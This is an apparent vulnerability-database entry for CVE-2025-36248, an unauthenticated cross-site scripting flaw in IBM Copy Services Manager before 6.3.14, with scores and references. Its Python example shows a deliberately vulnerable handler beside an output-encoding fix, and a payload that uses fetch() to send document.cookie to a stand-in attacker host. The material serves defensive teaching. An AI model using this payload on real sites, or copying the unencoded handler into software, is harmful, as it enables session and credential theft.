CVE-2025-36248

MEDIUM

IBM Copy Services Manager < 6.3.14 - Unauthenticated Cross-Site Scripting

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2025-36248. PoCs published by MarioTesoro.

AI-analyzed exploit summary: the linked repository collects technical writeups for several CVEs (SQL injection, XSS and CSRF), one of which covers CVE-2025-36248. Each README gives steps to reproduce, affected versions, an impact analysis and mitigations.

Description

IBM Copy Services Manager 6.3.13 is vulnerable to cross-site scripting (CWE-79). An unauthenticated attacker can embed arbitrary JavaScript in the Web UI, altering its intended behaviour; when the script runs in the browser of a user who holds a trusted (authenticated) session, it can disclose that user's credentials. The attacker needs no account (CVSS PR:N), but a victim must open the crafted content (UI:R).
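The fix pattern for a CWE-79 bug of this kind is context-aware output encoding. The following is an added, illustrative example and not IBM Copy Services Manager code: the handler, the reflected parameter, its three output contexts and the payload are all constructed for the example, and attacker.invalid is a reserved name that never resolves. It shows the vulnerable reflection beside the encoded form, plus a small check that counts how many real `<script>` start tags each rendering contains.

```python
"""Reflected-XSS (CWE-79) fix pattern: encode output for the context it lands in.

Illustrative stand-in, not IBM Copy Services Manager code. The handler, the
parameter name and the payload below are constructed for this example.
"""
import html
import json
import re

# Constructed payload of the kind an unauthenticated attacker would place in a
# reflected parameter so that it runs inside a logged-in user's browser session
# and sends session material to a host the attacker controls.
CONSTRUCTED_PAYLOAD = (
    '"><script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
)


def render_vulnerable(query: str) -> str:
    """Hypothetical vulnerable handler: reflects the parameter verbatim into
    three different output contexts (text node, attribute value, JS string)."""
    return (
        f"<p>Results for: {query}</p>"
        f'<input name="q" value="{query}">'
        f'<script>var lastQuery = "{query}";</script>'
    )


def encode_html(value: str) -> str:
    """HTML text and quoted-attribute context: &, <, >, \" and ' become entities."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """JavaScript string-literal context inside <script>: JSON-encode, then also
    escape <, > and & so the value can never close the enclosing <script>
    element. ensure_ascii (the default) already turns U+2028/U+2029 into \\u
    escapes, which would otherwise terminate a JS line."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def render_fixed(query: str) -> str:
    """Same page, each interpolation encoded for the context it lands in."""
    return (
        f"<p>Results for: {encode_html(query)}</p>"
        f'<input name="q" value="{encode_html(query)}">'
        f"<script>var lastQuery = {encode_js_string(query)};</script>"
    )


_SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def count_script_tags(markup: str) -> int:
    """Number of real <script> start tags in the markup. The fixed page has
    exactly one (its own); every extra one is attacker-controlled."""
    return len(_SCRIPT_OPEN.findall(markup))


if __name__ == "__main__":
    for name, page in (("vulnerable", render_vulnerable(CONSTRUCTED_PAYLOAD)),
                       ("fixed", render_fixed(CONSTRUCTED_PAYLOAD))):
        print(f"{name}: {count_script_tags(page)} <script> start tag(s)")
        print(page)
```

The payload breaks out of all three unencoded contexts (the vulnerable page ends up with four `<script>` start tags, the fixed one keeps only its own), and the encoded value still round-trips as the same string for the application, so the fix loses no functionality. Note that an HttpOnly flag on the session cookie blunts the `document.cookie` exfiltration specifically, but not a script that reads credentials or tokens out of the page DOM, which is why encoding, not cookie flags, is the actual remediation.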

Exploits (1)

github WRITEUP
by MarioTesoro · poc
https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-36248


Classification (AI analysis of the whole repository, not only the CVE-2025-36248 writeup)
Writeup 95%
Attack Type
Sqli | Xss | Csrf
Complexity
Moderate
Reliability
Reliable
Target: Veritas Data Insight, ACI Worldwide Proactive Risk Manager, Kanboard, Engineering Ingegneria Informatica SpagoBI (other CVEs covered by the same repository; this entry's target is IBM Copy Services Manager)
Auth required
Prerequisites: Admin access for some exploits · Authenticated user session for XSS/CSRF (for this CVE the attacker needs no credentials, per PR:N in the CVSS vector; it is the victim who must hold an authenticated Web UI session)
devstral-2 · analyzed Feb 27, 2026

References (1)

Vendor Advisory (vendor-advisory, patch)
https://www.ibm.com/support/pages/node/7245562

Scores

CVSS v3.1 base score 6.1 (Medium)
EPSS 0.0020 (0.20%)
EPSS Percentile 9.6%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact partial

Details

CWE
CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')
Status published
Products (1)
ibm/copy_services_manager < 6.3.14
Published Sep 19, 2025
Tracked Since Feb 18, 2026